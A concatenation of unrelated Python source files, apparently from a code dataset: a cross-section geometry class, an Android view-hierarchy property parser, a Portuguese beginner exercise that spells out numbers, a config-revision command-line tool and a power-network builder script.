class AttrDict(dict):
"""
A dictionary that can be assigned to.
"""
pass
|
python
|
from numpy import sin, cos, pi, fabs, sign, roll, arctan2, diff, cumsum, hypot, logical_and, where, linspace
from scipy import interpolate
import matplotlib.pyplot as plt
# Cross-section class that stores x, y points for the cross-section
# and calculates various geometry data
d = 1000
class CrossSection:
"""
Class that contains geometry of and measurements of a cross-section.
Parameters
----------
x : x-coordinates of cross-section
y : y-coordinates of cross-section
Attributes
----------
x : x-coordinates of cross-section
y : y-coordinates of cross-section
xm : coordinates x[i-1]
xp : coordinates x[i+1]
ym : coordinates y[i-1]
yp : coordinates y[i+1]
A : cross-sectional area
P : cross-section perimeter
l : distance between x[i-1], y[i-1] and x, y
r_l : distance between x, y and reference point
umx : x-coordinate of reference point
umy : y-coordinate of reference point
"""
# Number of points that define the cross-section
def __init__(self, x, y):
self.x = x
self.y = y
self.roll()
# Sets the point of maximum velocity
def setUMPoint(self, umx, umy):
"""
Sets umx, umy.
Parameters
----------
umx : x-coordinate of reference point
umy : y-coordinate of reference point
"""
self.umx = umx
self.umy = umy
# Create arrays of x+1, y+1, x-1, x+1
def roll(self):
"""Creates xm, xp, ym, yp.
"""
self.xm = roll(self.x, 1)
self.ym = roll(self.y, 1)
self.xp = roll(self.x, self.x.size-1)
self.yp = roll(self.y, self.y.size-1)
# Calculate perimeter and area
def calcShapeParams(self):
self.genL()
self.calcA()
# l stores difference between each perimeter point
# pp is the length along perimeter to a point
# pp[-2] is the channel perimeter
def genL(self):
"""
Creates l and P.
"""
self.l = hypot(self.x - self.xp, self.y - self.yp)
self.pp = cumsum(self.l)
self.P = self.pp[-2]
# Calculates area of the cross-section
def calcA(self):
"""
Creates A.
"""
self.sA = (self.xm*self.y - self.x*self.ym).sum() * 0.5
self.A = fabs(self.sA)
# Generate lengths from maximum velocity point to perimeter points
def genRL(self):
"""
Creates r_l.
"""
self.r_l = hypot(self.x-self.umx, self.y-self.umy)
# Find left and right points defining a height above the cross-section
# bottom
def findLR(self, h):
"""
Finds left and right index given a height above the
lowest point in the cross-section.
Parameters
----------
h : height above the floor
Returns
-------
L : left index of x, y coordinate h above the floor
R : right index of x, y coordinate h above the floor
"""
ymin = self.y.min()
a_h = ymin + h
condL = logical_and(self.y > a_h, a_h > self.yp)
condR = logical_and(self.y < a_h, a_h < self.yp)
L = where(condL)[0][0] + 1
R = where(condR)[0][0]
return L,R
# Find centroid, maximum velocity position in phreatic cases
def findCentroid(self):
"""
Calculates centroid of the cross-section.
Returns
-------
cx : x-coordinate of centroid
cy : y-coordinate of centroid
"""
m = self.xm*self.y-self.x*self.ym
cx = (1/(6*self.sA))*((self.x + self.xm)*m).sum()
cy = (1/(6*self.sA))*((self.y + self.ym)*m).sum()
return cx, cy
# Redraw some length rl away normal to the perimeter
# It may be advantageous for stability to resample using a spline fit
# Setting dl sets the number of points defining the cross-section
## after resampling.
def redraw(self, rl, resample=False, dl=d):
"""
Regenerate cross-section perpendicular to current
given a distance for each x,y point.
Parameters
----------
rl : array of distances to move x, y points
resample : [bool] option to resample points equidistantly along
perimeter (optional)
dl : number of points in resampled cross-section (optional)
"""
alpha = arctan2(self.xp-self.xm, self.yp-self.ym)
nx = self.x + sign(self.x)*rl*cos(alpha)
ny = self.y - sign(self.x)*rl*sin(alpha)
# Check if we drew inside or outside..
c = ccw(self.x, self.y, self.xm, self.ym, nx, ny)
nx[c] = (self.x - sign(self.x)*rl*cos(alpha))[c]
ny[c] = (self.y + sign(self.x)*rl*sin(alpha))[c]
#Resample points by fitting spline
if resample:
tck, u = interpolate.splprep([nx, ny], u=None, k=1, s=0.0)
un = linspace(u.min(), u.max(), dl if dl!=nx.size else nx.size)
nx, ny = interpolate.splev(un, tck, der=0)
# New coordinates
y_roll = ny.size - ny.argmax()
nx = roll(nx, y_roll)
ny = roll(ny, y_roll)
self.x = nx
self.y = ny
self.roll()
# Counter clockwise function to determine if we drew points in the correct
# direction
def ccw(x, y, xm, ym, nx, ny):
"""
Determines if redrawn points are counter clockwise in cross-section
Parameters
----------
x : x-coordinates of cross-section
y : y-coordinates of cross-section
xm : x[i-1]
ym : y[i-1]
nx : new x-coordinate
ny : new y-coordinate
Returns
-------
ccw : Array of bools indicating which new points are counter clockwise
"""
return (x - xm) * (ny - ym) > (y - ym) * (nx - xm)
# Calculate length of curve defined by points
def calcL(x,y):
"""
Calculates length of a curve given x,y points
Parameters
----------
x : x-coordinates of points
y : y-coordinates of points
Returns
-------
length : length of curve
"""
sub_lengths = hypot(x[1:] - x[:-1], y[1:] - y[:-1])
sub_sums = cumsum(sub_lengths)
length = sub_sums[-1]
return length
def calcArea(x, y, l=0, r=0):
"""
Calculates area of a polygon given x,y points
Parameters
----------
x : x-coordinates of points defining polygon
y : y-coordinates of points defining polygon
l : left index of subset of points (optional)
r : right index of subset of points (optional)
Returns
-------
A - area of polygon
"""
if l and r:
sA = (roll(x[l:r],1)*y[l:r] - x[l:r]*roll(y[l:r],1)).sum()
else:
sA = (roll(x,1)*y - x*roll(y,1)).sum()
return fabs(0.5 * sA)
|
python
|
#! python2.7
## -*- coding: utf-8 -*-
## kun for Apk View Tracking
## ParseElement.py
from DeviceManagement.Device import Device
from TreeType import CRect
from Utility import str2int
class ParseElement():
def __init__(self, element_data):
self.class_name = ""
self.hash_code = ""
self.properties_dict = {}
self.element_data = element_data.lstrip(" ")
def getInt(self, string, integer):
try:
return int(self.properties_dict[string])
except:
return integer
def getBoolean(self, string, boolean):
try:
if "false" == self.properties_dict[string]:
return False
elif "true" == self.properties_dict[string]:
return True
else:
return boolean
except:
return boolean
def loadProperties(self, data):
i = 0
data_length =len(data)
while True:
if i >= data_length:
break
key_sep_index = data.index("=", i)
key = data[i : key_sep_index]
value_length_sep_index = data.index(",", key_sep_index+1)
value_length = int(data[key_sep_index+1 : value_length_sep_index])
i = value_length_sep_index + 1 + value_length
value = data[value_length_sep_index+1 : value_length_sep_index+1+value_length]
self.properties_dict[key] = value
i += 1
self.id = self.properties_dict["mID"]
if "mLeft" in self.properties_dict.keys():
self.left = self.getInt("mLeft", 0)
else:
self.left = self.getInt("layout:mLeft", 0)
if "mRight" in self.properties_dict.keys():
self.right = self.getInt("mRight", 0)
else:
self.right = self.getInt("layout:mRight", 0)
if "mTop" in self.properties_dict.keys():
self.top = self.getInt("mTop", 0)
else:
self.top = self.getInt("layout:mTop", 0)
if "mBottom" in self.properties_dict.keys():
self.bottom = self.getInt("mBottom", 0)
else:
self.bottom = self.getInt("layout:mBottom", 0)
if "getWidth()" in self.properties_dict.keys():
self.width = self.getInt("getWidth()", 0)
else:
self.width = self.getInt("layout:getWidth()", 0)
if "getHeight()" in self.properties_dict.keys():
self.height = self.getInt("getHeight()", 0)
else:
self.height = self.getInt("layout:getHeight()", 0)
if "mScrollX" in self.properties_dict.keys():
self.scrollX = self.getInt("mScrollX", 0)
else:
self.scrollX = self.getInt("scrolling:mScrollX", 0)
if "mScrollY" in self.properties_dict.keys():
self.scrollY = self.getInt("mScrollY", 0)
else:
self.scrollY = self.getInt("scrolling:mScrollY", 0)
if "mPaddingLeft" in self.properties_dict.keys():
self.paddingLeft = self.getInt("mPaddingLeft", 0)
else:
self.paddingLeft = self.getInt("padding:mPaddingLeft", 0)
if "mPaddingRight" in self.properties_dict.keys():
self.paddingRight = self.getInt("mPaddingRight", 0)
else:
self.paddingRight = self.getInt("padding:mPaddingRight", 0)
if "mPaddingTop" in self.properties_dict.keys():
self.paddingTop = self.getInt("mPaddingTop", 0)
else:
self.paddingTop = self.getInt("padding:mPaddingTop", 0)
if "mPaddingBottom" in self.properties_dict.keys():
self.paddingBottom = self.getInt("mPaddingBottom", 0)
else:
self.paddingBottom = self.getInt("padding:mPaddingBottom", 0)
if "layout_leftMargin" in self.properties_dict.keys():
self.marginLeft = self.getInt("layout_leftMargin", -2147483648)
else:
self.marginLeft = self.getInt("layout:layout_leftMargin", -2147483648)
if "layout_rightMargin" in self.properties_dict.keys():
self.marginRight = self.getInt("layout_rightMargin", -2147483648)
else:
self.marginRight = self.getInt("layout:layout_rightMargin", -2147483648)
if "layout_topMargin" in self.properties_dict.keys():
self.marginTop = self.getInt("layout_topMargin", -2147483648)
else:
self.marginTop = self.getInt("layout:layout_topMargin", -2147483648)
if "layout_bottomMargin" in self.properties_dict.keys():
self.marginBottom = self.getInt("layout_bottomMargin", -2147483648)
else:
self.marginBottom = self.getInt("layout:layout_bottomMargin", -2147483648)
if "getBaseline()" in self.properties_dict.keys():
self.baseline = self.getInt("getBaseline()", 0)
else:
self.baseline = self.getInt("layout:getBaseline()", 0)
if "willNotDraw()" in self.properties_dict.keys():
self.willNotDraw = self.getBoolean("willNotDraw()", False)
else:
self.willNotDraw = self.getBoolean("drawing:willNotDraw()", False)
if "hasFocus()" in self.properties_dict.keys():
self.hasFocus = self.getBoolean("hasFocus()", False)
else:
self.hasFocus = self.getBoolean("focus:hasFocus()", False)
if "isClickable()" in self.properties_dict.keys():
self.isClickable = self.getBoolean("isClickable()", False)
if "isEnabled()" in self.properties_dict.keys():
self.isEnabled = self.getBoolean("isEnabled()", False)
self.hasMargins = ((self.marginLeft != -2147483648) and (self.marginRight != -2147483648)
and (self.marginTop != -2147483648) and (self.marginBottom != -2147483648))
def parseElmentData(self):
data = self.element_data.lstrip(" ")
sep_index = data.index("@")
self.class_name = data[0 : sep_index]
sub_string = data[sep_index+1 : ]
sep_index = sub_string.index(" ")
self.hash_code = sub_string[0 : sep_index]
sub_string = sub_string[sep_index+1 : ]
self.loadProperties(sub_string)
#===============================================================================
# # get Class Name of View and its Instance Storage Address's Hash Code
# # android.widget.ListView@44ed6480
# # android.widget.TextView@44ed7e08
#===============================================================================
def getClassName(self,):
return self.class_name
#===========================================================================
# # get Hash Code
#===========================================================================
def getHashCode(self):
return self.hash_code
#===============================================================================
# # etc. mID=7,id/sqrt
# # etc. mID=14,id/panelswitch
#===============================================================================
def getID(self):
return self.id
#===============================================================================
# # getVisibility()=n, xxx
# # three states: VISIBLE, GONE,
#===============================================================================
def getVisible(self):
if "getVisibility()" in self.properties_dict.keys():
res = self.properties_dict["getVisibility()"]
# print res
if "VISIBLE" == res:
return True
elif "GONE" == res:
return False
elif "INVISIBLE" == res:
return False
else:
return False
else:
return None
#===============================================================================
# # isClickable()=4,true
# # isClickable()=5,false
#===============================================================================
def getClickable(self):
if "isClickable()" in self.properties_dict.keys():
return self.isClickable
else:
return None
#===============================================================================
# # isEnabled()=4,true
#===============================================================================
def getEnable(self):
if "isEnabled()" in self.properties_dict.keys():
return self.properties_dict["isEnabled()"]
else:
return None
#===============================================================================
# # willNotDraw()=5,false
# # willNotDraw()=4,true
#===============================================================================
def getWillNotDraw(self):
if "willNotDraw()" in self.properties_dict.keys():
return self.properties_dict["willNotDraw()"]
else:
return None
#===============================================================================
# # mPrivateFlags_NOT_DRAWN=3,0x0 false
# # mPrivateFlags_DRAWN=4,0x20 true
#===============================================================================
def getDRAWN(self):
if "mPrivateFlags_DRAWN" in self.properties_dict.keys():
res = self.properties_dict["mPrivateFlags_DRAWN"]
if "0x20" == res:
return True
else:
return None
elif "mPrivateFlags_NOT_DRAWN" in self.properties_dict.keys():
res = self.properties_dict["mPrivateFlags_NOT_DRAWN"]
if "0x0" == res:
return False
else:
return None
else:
return None
#===============================================================================
# # etc. mText=3,log
# # etc. mText=1,√
#===============================================================================
def getText(self):
if "mText" in self.properties_dict.keys():
return self.properties_dict["mText"]
else:
return None
def getRectArea(self):
rect = CRect()
rect.mTop = self.top
rect.mBottom = self.bottom
rect.mLeft = self.left
rect.mRight = self.right
return rect
#===============================================================================
# # this method has not used yet.
#===============================================================================
def getRectMidPoint(self, element):
mid_point = {"x": None,
"y": None}
rect = {"left": None,
"right": None,
"top": None,
"bottom": None}
tag_list = element.split(" ")
for tag in tag_list:
if "mTop=" in tag:
l = tag.split(",")
rect["top"] = l[1]
elif "mBottom=" in tag:
l = tag.split(",")
rect["bottom"] = l[1]
elif "mLeft=" in tag:
l = tag.split(",")
rect["left"] = l[1]
elif "mRight" in tag:
l = tag.split(",")
rect["right"] = l[1]
if (rect["top"]!=None) and (rect["bottom"]!=None) and (rect["left"]!=None) and (rect["right"]!=None):
mid_point["x"] = (str2int(rect["right"])-str2int(rect["left"]))/2.0
mid_point["y"] = (str2int(rect["bottom"])-str2int(rect["top"]))/2.0
return mid_point
if __name__=="__main__":
device = Device()
data = device.getInfosByTelnet("DUMP -1")
element_parser = ParseElement()
element_parser.getStructure(data)
|
python
|
#Crie um progama que tenha uma tupla totalmente preenchida com uma contagem por extensão de Zero até Vinte.
#Seu programa deverá ler um número pelo teclado (entre 0 e 20) e mostra-lo por extenso.
numeros = ('zero','um', 'dois','três','quatro','cinco','seis','sete','oito','nove','dez','onze','doze','treze','quatorze',
'quinze','dezesseis','dezessete','dezoito','dezenove','vinte')
while True:
c = int(input('Digite um número entre 0 e 20: '))
if 0 <= c <= 20 :
break
print('Tente novamente!')
print(numeros[c])
|
python
|
import sys
import logging
import logging.handlers
from command_tree import CommandTree, Config
from voidpp_tools.colors import ColoredLoggerFormatter
from .core import Evolution, Chain
from .revision import REVISION_NUMBER_LENGTH
tree = CommandTree(Config(
prepend_double_hyphen_prefix_if_arg_has_default = True,
generate_simple_hyphen_name = {},
))
@tree.root()
@tree.argument(action = 'store_true', help = "log more stuffs")
class Root():
def __init__(self, verbose = False):
logger = logging.getLogger('configpp')
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG if verbose else logging.INFO)
handler.setFormatter(ColoredLoggerFormatter(verbose))
logger.addHandler(handler)
@tree.leaf(help = "Initialize a new scripts directory")
@tree.argument(help = "location of scripts directory", nargs = '?')
def init(self, folder = Evolution.DEFAULT_FOLDER):
ev = Evolution()
return 0 if ev.init(folder) else 1
@tree.leaf(help = "Create a new revision file")
@tree.argument(help = "Message")
@tree.argument(help = "a new configpp uri in configpp://TODO format")
def revision(self, message, uri: str = None):
ev = Evolution()
ev.load()
return 0 if ev.revision(message, uri) else 1
@tree.leaf(help = "Upgrade to a later version")
@tree.argument(help = "Target revision", nargs = '?')
def upgrade(self, target = 'head'):
ev = Evolution()
ev.load()
ev.upgrade(target)
return 0
@tree.leaf(help = "List changeset scripts in chronological order")
def history(self):
ev = Evolution()
ev.load()
chain = ev.chain
for id, rev in chain.links.items():
print("{} -> {} : {}".format(rev.parent_id or ' ' * REVISION_NUMBER_LENGTH, rev.id, rev.message))
|
python
|
import os
import pandapower as pp
import pandapower.networks as pn
from pandapower.plotting.plotly import pf_res_plotly
from preparation import NetworkBuilder
import_rules = dict()
aemo_data = r"data/aemo_data_sources.json"
tnsp_buses = r"data/electranet_buses.json"
if __name__ == "__main__":
builder = NetworkBuilder(name="ElectraNet", f_hz=50.0, sn_mva=100)
builder.parse_bus_data(import_rules=tnsp_buses)
builder.build_nodes()
breakpoint()
print(builder)
#pf_res_plotly(net)
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.